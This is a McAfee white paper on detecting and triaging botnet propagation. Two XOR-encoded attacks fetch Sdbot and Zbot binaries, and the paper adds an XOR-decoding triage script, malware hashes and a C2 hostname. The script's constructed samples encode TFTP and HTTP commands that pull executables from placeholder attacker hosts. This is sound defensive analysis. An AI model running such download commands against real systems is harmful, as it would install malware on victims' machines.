Detecting Botnet Propagation
How to confirm maliciousness
This paper describes techniques that should only be performed by qualified experts in a controlled and isolated environment. Any attempt to recreate or duplicate the descriptions is at your own risk.

This white paper was written by:
Tony Lee, Principal Security Consultant, McAfee Foundstone Professional Services

Table of Contents
The Environment
Initial Discovery
Tale of Two Events
  Suspicious event 1: TFTP
  Suspicious event 2: HTTP
Static and Dynamic Analysis
  File information
  Imports
  Registry keys
  Files involved
  DNS requests
What Now?
Conclusion
About the Author
About McAfee Foundstone Professional Services

Detecting Botnet Propagation 2
Discovering and triaging network nastiness can be tricky at times, so it helps to have some tools and techniques to aid you in that task. This paper explains botnet propagation techniques uncovered during a recent investigation, along with the tools and techniques used to quickly evaluate two separate events. From discovery to confirmation, it should not take more than 10 to 15 minutes per event if the proper environment is already established.

Warning: Please take great care when surfing to or obtaining files from any of the addresses listed in this paper; these programs are designed to spread quickly and maintain persistence.

The Environment

Detection and analysis environments can vary widely. The environment outlined in this paper was used to quickly triage events. Other devices can be substituted or added as necessary, but it may be helpful to explain our core detection and analysis setup.

[Figure 1 (diagram; labels recovered from the image): Internet -> McAfee Network Threat Response (Stage 1: McAfee Global Threat Intelligence URL/Web/File reputation, Network Signatures, File Mismatch, Internal Analysis, Antivirus, Shell Code) -> Samples Share [File Drop] -> Automated Analysis (Stage 2: File Scan, Encoding Analysis, Engine, ValidEdge, Cuckoo) -> Analysis Share [Reports] -> Manual Analysis (Stage 3: Analyst).]
Figure 1. The environment used to detect and quickly analyze the propagation outlined in this paper.

The environment shown in Figure 1 is designed for rapid detection and triaging of events. Stage 1 of the environment leverages a McAfee Network Threat Response appliance, part of the Intel Security product offering, which captures traffic from the Internet and uses a series of internal criteria to determine maliciousness. It contains the following detection mechanisms:
1. Network signatures.
2. Antivirus definitions.
3. File reputation (McAfee Global Threat Intelligence).
4. IP and URL reputation (McAfee TrustedSource) technology.
5. Static file analysis:
   a. Hidden information.
   b. Shellcode detection.
   c. Obfuscation detection.
McAfee Network Threat Response can be used to view the detection, raw traffic, decoded traffic, parties involved, and file metadata. If a file is determined to be malicious, McAfee Network Threat Response can alert the analyst to an event and send the carved file to an automated analysis engine, which performs static and dynamic analysis to produce an automated analysis report. The analyst can review the report and then decide whether further analysis is necessary. Since stage 3 analysis is a manual process performed by a human being, it is costly in time, money, and resources.

Initial Discovery

Finding malicious packets in a sea of packets is a difficult task. Fortunately, there are products that spend all of their CPU cycles looking for them. The product that we happen to have deployed is McAfee Network Threat Response. The McAfee Network Threat Response dashboard notifies analysts of anomalies, as shown in Figure 2 below. While investigating shellcode detections, we ran across two unrelated, but very interesting, events.

Figure 2. McAfee Network Threat Response dashboard.
Tale of Two Events

What made the two suspicious events in the McAfee Network Threat Response dashboard most interesting is that they served up different bots and used different propagation techniques and protocols.

Suspicious event 1: TFTP

After clicking on the shellcode event, we see the session detail of the two hosts involved in the first incident:

Source Host: XX.XXX
Source Port: 1922
Destination Host: XX.XXX
Destination Port: 135

Figure 3. Session details of the event after clicking on the dashboard indicator.

In the session view shown above, McAfee Network Threat Response gives us the option to drill down and view the raw network traffic by clicking on the TCP hyperlink. The traffic was illegible in its raw form; however, McAfee Network Threat Response detected that it was XOR encoded with a static hex value of 0x13. From there, it was possible to leverage McAfee Network Threat Response's shellcode detector (shown in the screenshot below) to apply the key and decode the traffic. The decoded traffic revealed a TFTP file transfer request back to the suspected attacker's address for a file called host.exe. TFTP is a very common file transfer protocol used by attackers and worms to transfer additional files (such as hacking tools or malicious software) to and from a remote host.
Figure 4a. Detailed view of raw traffic and McAfee Network Threat Response decoded traffic. Raw traffic reveals a potential signature of MEOW, and decoded traffic reveals the propagation mechanism.

Figure 4b. Magnified view of raw and decoded traffic in Figure 4a.

Oddly, within the raw encoded traffic, the string MEOW appears multiple times. This could potentially be used as a signature to detect this malicious traffic. To more easily explain the propagation method, we have diagrammed the events.
Figure 5. The first stage in the propagation.

The diagram above depicts the attacker remotely issuing the TFTP command to the victim. This command is executed on the victim's system, which communicates back to the attacker's system to obtain the host.exe file (as shown in the Figure 6 diagram).

Figure 6. The resulting transfer.
So what is this host.exe? It doesn't sound too bad, right? Running the MD5 hash through VirusTotal.com confirmed our suspicions that this is an undesirable file.

Figure 7. Results of running the hash through VirusTotal.

It appears that it is an Internet worm (Win32/Sdbot) that spreads through weak Microsoft Windows credentials on network shares. According to McAfee Labs, this worm has the following characteristics:
- Exploits the MS vulnerability.
- Provides a backdoor to the victim machine, thereby compromising data on that machine (significant remote access functionality is available to the hacker).
- Propagates to machines with poorly secured network shares (weak username/password combinations) or accessible shares (where local credentials are sufficient to write files to other systems).
- Propagates to remote machines (it generates random IPs) by attempting to copy itself to a number of shares.
- The bot also listens locally on a random high TCP port, as well as UDP port 69 (presumably for use in TFTP callback attacks).
- Analysis suggests the bot provides its author with extensive control functions such as downloading additional software or updates, control and reporting for further spreading, reporting host system characteristics, and others.
Source:
Suspicious event 2: HTTP

A second, believed-to-be-unrelated event was also detected, and the session details are shown below:

Source Host: XX.XXX
Source Port:
Destination Host: XX.XX
Destination Port: 445

Figure 8. Session details after clicking on the dashboard show the hosts and ports involved.
Inspecting the raw traffic of this session yields more encoded traffic, this time XOR'd with the static key of 0x85. When decoded, it appears that the attacker is issuing an HTTP request to a third-party server hosting the dd.exe file.

Figure 9a. Decoded suspicious traffic yields an HTTP request.

Figure 9b. Magnified view of raw and decoded traffic in Figure 9a.
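Both events became readable only after the raw session bytes were XOR-decoded with a static one-byte key (0x13 for the TFTP event, 0x85 for the HTTP event), and the first event's raw traffic carried the repeated MEOW marker. The script below is an added example, not code from the paper or from McAfee Network Threat Response: it recovers a single-byte key by trying all 256 values and scoring each candidate plaintext for the download-stage indicators the paper shows, pulls out the executable names requested, and counts MEOW in the raw bytes. The indicator weights, the sample payloads (constructed, encoded with the two keys above) and the placeholder addresses are assumptions.

```python
"""Single-byte XOR triage for carved session payloads.

Added example; not code from the paper or from McAfee Network Threat Response.
Recovers a static one-byte XOR key by brute force, scores each candidate
plaintext for download-stage indicators (tftp, GET, .exe), extracts the file
names requested, and counts the "MEOW" marker seen in the raw traffic.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Indicator weights are an assumption for this example; tune them for your traffic.
INDICATORS = {b"tftp": 5, b"GET ": 4, b"http://": 4, b".exe": 3, b"cmd": 2}

# Bytes accepted as text: printable ASCII plus tab, LF and CR.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


@dataclass
class Candidate:
    key: int
    score: int
    plaintext: bytes


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key; XOR is its own inverse, so this also decodes."""
    return bytes(b ^ key for b in data)


def score_plaintext(text: bytes) -> int:
    """Score a decode candidate; 0 unless it is at least 90% printable text."""
    printable = sum(1 for b in text if b in PRINTABLE)
    if not text or printable < 0.9 * len(text):
        return 0
    return sum(w * text.count(needle) for needle, w in INDICATORS.items())


def recover_key(data: bytes, min_score: int = 5) -> Optional[Candidate]:
    """Return the best-scoring single-byte key, or None when no candidate holds
    enough indicators. Key 0x00 is tried too, so unencoded commands are found."""
    best: Optional[Candidate] = None
    for key in range(256):
        plaintext = xor_bytes(data, key)
        score = score_plaintext(plaintext)
        if score >= min_score and (best is None or score > best.score):
            best = Candidate(key, score, plaintext)
    return best


def requested_executables(text: bytes) -> list[str]:
    """File names ending in .exe named in the decoded command or request."""
    return [m.decode("ascii") for m in re.findall(rb"[\w.-]+\.exe", text)]


def meow_count(raw: bytes) -> int:
    """Count the "MEOW" marker in the raw (still encoded) session bytes. MEOW is
    the signature of the DCOM OBJREF structure, so on TCP/135 it marks the
    marshalled DCOM data carrying the payload and can anchor a signature."""
    return raw.count(b"MEOW")


def triage(raw: bytes) -> dict:
    """One-shot triage of a carved payload: key, decoded text, .exe names, MEOW count."""
    cand = recover_key(raw)
    return {
        "key": None if cand is None else cand.key,
        "decoded": None if cand is None else cand.plaintext,
        "executables": [] if cand is None else requested_executables(cand.plaintext),
        "meow": meow_count(raw),
    }


# Constructed samples (not captures from the paper): the command stage of each
# event, encoded with the key the paper reports for it. The address is from the
# 192.0.2.0/24 documentation range and the host name is a placeholder.
SAMPLE_TFTP = (b"MEOW"
               + xor_bytes(b"tftp -i 192.0.2.10 GET host.exe host.exe\r\n", 0x13)
               + b"MEOW")
SAMPLE_HTTP = xor_bytes(b"GET /dd.exe HTTP/1.0\r\nHost: malware-repo.invalid\r\n\r\n", 0x85)

if __name__ == "__main__":
    for label, sample in (("event 1 (TCP/135)", SAMPLE_TFTP), ("event 2 (TCP/445)", SAMPLE_HTTP)):
        result = triage(sample)
        key = "none" if result["key"] is None else f"0x{result['key']:02x}"
        print(f"{label}: key={key} exe={result['executables']} MEOW={result['meow']}")
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Feed it the carved payload bytes of a flagged session; a returned key with the decoded text is the point at which the paper moves on to looking up the named file's hash.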
A WHOIS query using DomainTools.com shows that the server hosting the file is registered in Russia.

Figure 10. Contact details for the organization that registered the web server that is hosting our malicious dd.exe.

We have once again diagrammed the attacker-to-victim communication to more easily explain the propagation method.

Figure 11. The first stage in the propagation.

The image above shows the initial communication with the host. The attacker instructs the victim to make a request to a web server at hxxp:// to obtain the dd.exe executable. The victim then downloads the file, as shown in Figure 12.
Figure 12. Diagram shows the victim reaching out to the Russian malware repository in order to grab dd.exe.

The name dd.exe is commonly used for the Windows port of the *nix disk copy tool; however, upon inspection, it was determined that the executable hosted within the malware repository was not this tool. The file was then sent to VirusTotal.com to determine if a known signature could be found.

Figure 13. At the time, VirusTotal showed 21 out of 46 virus engines detected this malware.
VirusTotal.com identified the dd.exe file as a known malicious file. McAfee classified this particular variant as PWS-Zbot.gen.arj. According to McAfee Labs, there is antivirus coverage in a .dat file, and the malware proliferation is heaviest in Russia. This information seems to reinforce our findings.

Figure 14. McAfee Labs heat map showing the proliferation of Zbot.
Static and Dynamic Analysis

Cuckoo Sandbox was used to further analyze the host.exe and dd.exe binaries. Cuckoo Sandbox is an extremely powerful tool available as part of the NTR CADS framework used for stage-two automated analysis. Just a sample of the stage-two analysis of dd.exe is shown below.

File information
File Name: dd.exe
File Size: bytes
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
CRC32: AFAB5FC6
MD5: 00c713ad2f0b189db600dfdc730b5034
SHA1: 7b9e1c5e95538c48a4a16ca2fdf90a9cdbe3a466
SHA256: f116b4fba18b5b12f04b4b0d31df7701bac1440d9e82659be258efaf3fbd8808

Imports
Library KERNEL32.dll (import addresses partly lost in extraction):
0x ExitProcess
0x VirtualFree
0x lstrcmpw
0x40700c - MultiByteToWideChar
0x GetCommandLineA
0x HeapSetInformation
0x GetStartupInfoW
0x40701c - TerminateProcess
0x GetCurrentProcess
0x UnhandledExceptionFilter
0x SetUnhandledExceptionFilter
0x40702c - IsDebuggerPresent
0x GetProcAddress
0x GetModuleHandleW
0x DecodePointer
0x40703c - WriteFile
0x GetStdHandle
0x GetModuleFileNameW
0x GetModuleFileNameA
0x40704c - FreeEnvironmentStringsW
0x WideCharToMultiByte
0x GetEnvironmentStringsW
0x SetHandleCount
0x40705c - InitializeCriticalSectionAndSpinCount
0x GetFileType
0x DeleteCriticalSection
0x EncodePointer
0x40706c - TlsAlloc
0x TlsGetValue
0x TlsSetValue
0x TlsFree
0x40707c - InterlockedIncrement
0x SetLastError
0x GetCurrentThreadId
0x GetLastError
0x40708c - InterlockedDecrement
0x HeapCreate
0x QueryPerformanceCounter
0x GetTickCount
0x40709c - GetCurrentProcessId
0x4070a0 - GetSystemTimeAsFileTime
0x4070a4 - LeaveCriticalSection
0x4070a8 - EnterCriticalSection
0x4070ac - LoadLibraryW
0x4070b0 - GetCPInfo
0x4070b4 - GetACP
0x4070b8 - GetOEMCP
0x4070bc - IsValidCodePage
0x4070c0 - HeapFree
0x4070c4 - Sleep
0x4070c8 - RtlUnwind
0x4070cc - HeapSize
0x4070d0 - LCMapStringW
0x4070d4 - GetStringTypeW
0x4070d8 - HeapAlloc
0x4070dc - HeapReAlloc
0x4070e0 - IsProcessorFeaturePresent

Registry keys
HKEY_LOCAL_MACHINE\SYSTEM\Setup

Files involved
C:\
C:\analyzer\
C:\WINDOWS\system32\shell32.dll
C:\WINDOWS\system32\shell32.dll.124.manifest
C:\WINDOWS\system32\shell32.dll.124.config

DNS requests
Hostname: tv.zabetwo.com
What Now?

At this point, since we have confirmed that these files are malicious, we need to do some clean up. Using McAfee Network Threat Response session analysis, we can pivot around the attacking host and see all of the other hosts that were potentially compromised through communication with the infected host. If the host falls under our administration, we can have it removed from the network and re-imaged. Otherwise, if the host is out of our administrative control, we may block communication to the infected host. To prevent further outbreak, a review of policies and procedures should take place to address the root cause of the infection and propagation.

Conclusion

This traffic is difficult to detect and analyze without the proper people, processes, and technology in place. You don't necessarily need to do reverse engineering; however, it is helpful to be able to do first- and second-stage triaging in order to gain perspective on the sophistication and damage that is constantly knocking at the door. Utilizing a tool like McAfee Network Threat Response can give you an immediate starting point for your investigation and condense a significant amount of analysis down to a few minutes.

About the Author

Tony Lee has more than eight years of professional experience pursuing his passion in all areas of information security. He is a principal security consultant at McAfee Foundstone Professional Services, part of the Intel Security product and service offering, in charge of advancing many of the network penetration service lines. His interests include Citrix and kiosk hacking, post exploitation, and SCADA exploitation. As an avid educator, Tony has instructed thousands of students at many venues worldwide, including government, universities, corporations, and conferences such as Black Hat. He takes every opportunity to share knowledge as a contributing author to Hacking Exposed 7 and was a lead instructor for a series of classes that includes McAfee Foundstone's Ultimate Hacking (UH), UH: Windows, UH: Expert, UH: Wireless, and UH: Web. He holds a bachelor of science in computer engineering from Virginia Polytechnic Institute and State University and a master of science in security informatics from The Johns Hopkins University.
About McAfee Foundstone Professional Services

McAfee Foundstone Professional Services, a division of McAfee, part of Intel Security, offers expert services and education to help organizations continuously and measurably protect their most important assets from the most critical threats. Through a strategic approach to security, McAfee Foundstone identifies and implements the right balance of technology, people, and process to manage digital risk and leverage security investments more effectively. The company's professional services team consists of recognized security experts and authors with broad security experience with multinational corporations, the public sector, and the US military.

About Intel Security

McAfee is now part of Intel Security. With its Security Connected strategy, innovative approach to hardware-enhanced security, and unique Global Threat Intelligence, Intel Security is intensely focused on developing proactive, proven security solutions and services that protect systems, networks, and mobile devices for business and personal use around the world. Intel Security is combining the experience and expertise of McAfee with the innovation and proven performance of Intel to make security an essential ingredient in every architecture and on every computing platform. Intel Security's mission is to give everyone the confidence to live and work safely and securely in the digital world.

McAfee. Part of Intel Security.
Mission College Boulevard, Santa Clara, CA

Intel and the Intel logo are registered trademarks of the Intel Corporation in the US and/or other countries. McAfee, the McAfee logo, Foundstone, and TrustedSource are registered trademarks or trademarks of McAfee, Inc. or its subsidiaries in the US and other countries. Other marks and brands may be claimed as the property of others. The product plans, specifications and descriptions herein are provided for information only and subject to change without notice, and are provided without warranty of any kind, express or implied.

Copyright 2013 McAfee, Inc.
wp_botnet-prop_0113B_ETMG
Summary McAfee Labs Threat Advisory W32/Autorun.worm.aaeb-h August 9, 2013 W32/Autorun.worm.aaeb-h has the ability to infect removable media devices, as well as mounted network shares. Infection starts
More informationIntroduction: 1. Daily 360 Website Scanning for Malware
Introduction: SiteLock scans your website to find and fix any existing malware and vulnerabilities followed by using the protective TrueShield firewall to keep the harmful traffic away for good. Moreover
More informationMcAfee Certified Assessment Specialist Network
McAfee Certified Assessment Specialist Network Exam preparation guide Table of Contents Introduction 3 Becoming McAfee Certified 3 Exam Details 4 Recommended Exam Preparation 4 Exam Objectives 4 Sample
More informationHow McAfee Endpoint Security Intelligently Collaborates to Protect and Perform
How McAfee Endpoint Security Intelligently Collaborates to Protect and Perform McAfee Endpoint Security 10 provides customers with an intelligent, collaborative framework, enabling endpoint defenses to
More informationManaging Latency in IPS Networks
Application Note Revision B McAfee Network Security Platform Managing Latency in IPS Networks Managing Latency in IPS Networks McAfee Network Security Platform provides you with a set of pre-defined recommended
More informationIntel Security Certified Product Specialist Security Information Event Management (SIEM)
Intel Security Certified Product Specialist Security Information Event Management (SIEM) Why Get Intel Security Certified? As technology and security threats continue to evolve, organizations are looking
More informationA New Approach to Assessing Advanced Threat Solutions
A New Approach to Assessing Advanced Threat Solutions December 4, 2014 A New Approach to Assessing Advanced Threat Solutions How Well Does Your Advanced Threat Solution Work? The cyber threats facing enterprises
More informationIntrusion Detection in AlienVault
Complete. Simple. Affordable Copyright 2014 AlienVault. All rights reserved. AlienVault, AlienVault Unified Security Management, AlienVault USM, AlienVault Open Threat Exchange, AlienVault OTX, Open Threat
More informationNetwork Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík
Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík {celeda velan jirsik}@ics.muni.cz Part I Introduction P. Čeleda et al. Network Security Monitoring and Behavior
More informationDetecting peer-to-peer botnets
Detecting peer-to-peer botnets Reinier Schoof & Ralph Koning System and Network Engineering University of Amsterdam mail: reinier.schoof@os3.nl, ralph.koning@os3.nl February 4, 2007 1 Introduction Spam,
More informationWhite Paper. McAfee Multi-Link. Always-on connectivity with significant savings
McAfee Multi-Link Always-on connectivity with significant savings Table of Contents Executive Summary...3 How McAfee Multi-Link Works...4 Outbound traffic...4 Load balancing...4 Standby links for high
More informationCombating Advanced Persistent Threats
White Paper How to prevent, detect, and remediate APTs Table of Contents Targeted Attacks Are on the Rise 3 What Is an APT? 4 Stages of a Targeted Attack 4 Early-Stage APT Detection and Prevention 5 Late-Stage
More informationMcAfee Phishing Quiz. Partner Enablement Guide
McAfee Phishing Quiz Partner Enablement Guide Use the Phishing Quiz to educate your own organization, prospects, and existing customers about phishing and how McAfee security solutions can help. This guide
More informationWhite Paper. Why Next-Generation Firewalls Don t Stop Advanced Malware and Targeted APT Attacks
White Paper Why Next-Generation Firewalls Don t Stop Advanced Malware and Targeted APT Attacks White Paper Executive Summary Around the world, organizations are investing massive amounts of their budgets
More informationCisco Security Intelligence Operations
Operations Operations of 1 Operations Operations of Today s organizations require security solutions that accurately detect threats, provide holistic protection, and continually adapt to a rapidly evolving,
More informationSPEAR PHISHING AN ENTRY POINT FOR APTS
SPEAR PHISHING AN ENTRY POINT FOR APTS threattracksecurity.com 2015 ThreatTrack, Inc. All rights reserved worldwide. INTRODUCTION A number of industry and vendor studies support the fact that spear phishing
More informationRSA Security Analytics
RSA Security Analytics This is what SIEM was Meant to Be 1 The Original Intent of SIEM Single compliance & security interface Compliance yes, but security? Analyze & prioritize alerts across various sources
More informationApplying machine learning techniques to achieve resilient, accurate, high-speed malware detection
White Paper: Applying machine learning techniques to achieve resilient, accurate, high-speed malware detection Prepared by: Northrop Grumman Corporation Information Systems Sector Cyber Solutions Division
More informationAlienVault. Unified Security Management (USM) 5.x Policy Management Fundamentals
AlienVault Unified Security Management (USM) 5.x Policy Management Fundamentals USM 5.x Policy Management Fundamentals Copyright 2015 AlienVault, Inc. All rights reserved. The AlienVault Logo, AlienVault,
More informationZscaler Cloud Web Gateway Test
Zscaler Cloud Web Gateway Test A test commissioned by Zscaler, Inc. and performed by AV-TEST GmbH. Date of the report: April15 th, 2016 Executive Summary In March 2016, AV-TEST performed a review of the
More informationThe Hillstone and Trend Micro Joint Solution
The Hillstone and Trend Micro Joint Solution Advanced Threat Defense Platform Overview Hillstone and Trend Micro offer a joint solution the Advanced Threat Defense Platform by integrating the industry
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More informationIBM Protocol Analysis Module
IBM Protocol Analysis Module The protection engine inside the IBM Security Intrusion Prevention System technologies. Highlights Stops threats before they impact your network and the assets on your network
More informationSOURCEFIRE RNA (REAL-TIME NETWORK AWARENESS)
SOURCEFIRE RNA (REAL-TIME NETWORK AWARENESS) DEALING WITH DYNAMIC THREATS INTRODUCTION The Maginot Line is considered to be one of the greatest failures of military history. It is a line of fortifications,
More informationDatabase Security in Virtualization and Cloud Computing Environments
White Paper Database Security in Virtualization and Cloud Computing Environments Three key technology challenges in protecting sensitive data Table of Contents Securing Information in Virtualization and
More informationEnd-user Security Analytics Strengthens Protection with ArcSight
Case Study for XY Bank End-user Security Analytics Strengthens Protection with ArcSight INTRODUCTION Detect and respond to advanced persistent threats (APT) in real-time with Nexthink End-user Security
More informationTotal Protection for Compliance: Unified IT Policy Auditing
Total Protection for Compliance: Unified IT Policy Auditing McAfee Total Protection for Compliance Regulations and standards are growing in number, and IT audits are increasing in complexity and cost.
More informationThe SIEM Evaluator s Guide
Using SIEM for Compliance, Threat Management, & Incident Response Security information and event management (SIEM) tools are designed to collect, store, analyze, and report on log data for threat detection,
More informationDeciphering and Mitigating Blackhole Spam from Email-borne Threats
Deciphering and Mitigating Blackhole Spam from Email-borne Threats Samir Patil Symantec Deciphering and Mitigating Blackhole Spam from Email-borne Threats 1 Outline 1 Background 2 Detection Challenges
More informationSecurity Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
More informationAdaptive IPS Security in a changing world. Dave Venman Security Engineer, UK & Ireland
Adaptive IPS Security in a changing world Dave Venman Security Engineer, UK & Ireland 2 Who Is Sourcefire? Mission: To help customers manage increasing risks and regulations by providing the most effective,
More informationSECURITY TERMS: Advisory Backdoor - Blended Threat Blind Worm Bootstrapped Worm Bot Coordinated Scanning
SECURITY TERMS: Advisory - A formal notice to the public on the nature of security vulnerability. When security researchers discover vulnerabilities in software, they usually notify the affected vendor
More informationContext Threat Intelligence
Context Threat Intelligence Threat Advisory The Monju Incident Context Ref. Author TA10009 Context Threat Intelligence (CTI) Date 27/01/2014 Tel +44 (0) 20 7537 7515 Fax +44 (0) 20 7537 1071 Email threat@contextis.co.uk
More informationNetwork Instruments white paper
Network Instruments white paper USING A NETWORK ANALYZER AS A SECURITY TOOL Network Analyzers are designed to watch the network, identify issues and alert administrators of problem scenarios. These features
More informationAPPLICATION PROGRAMMING INTERFACE
DATA SHEET Advanced Threat Protection INTRODUCTION Customers can use Seculert s Application Programming Interface (API) to integrate their existing security devices and applications with Seculert. With
More informationHow To Buy Nitro Security
McAfee Acquires NitroSecurity McAfee announced that it has closed the acquisition of privately owned NitroSecurity. 1. Who is NitroSecurity? What do they do? NitroSecurity develops high-performance security
More informationAddressing APTs and Modern Malware with Security Intelligence Date: September 2013 Author: Jon Oltsik, Senior Principal Analyst
ESG Brief Addressing APTs and Modern Malware with Security Intelligence Date: September 2013 Author: Jon Oltsik, Senior Principal Analyst Abstract: APTs first came on the scene in 2010, creating a wave
More information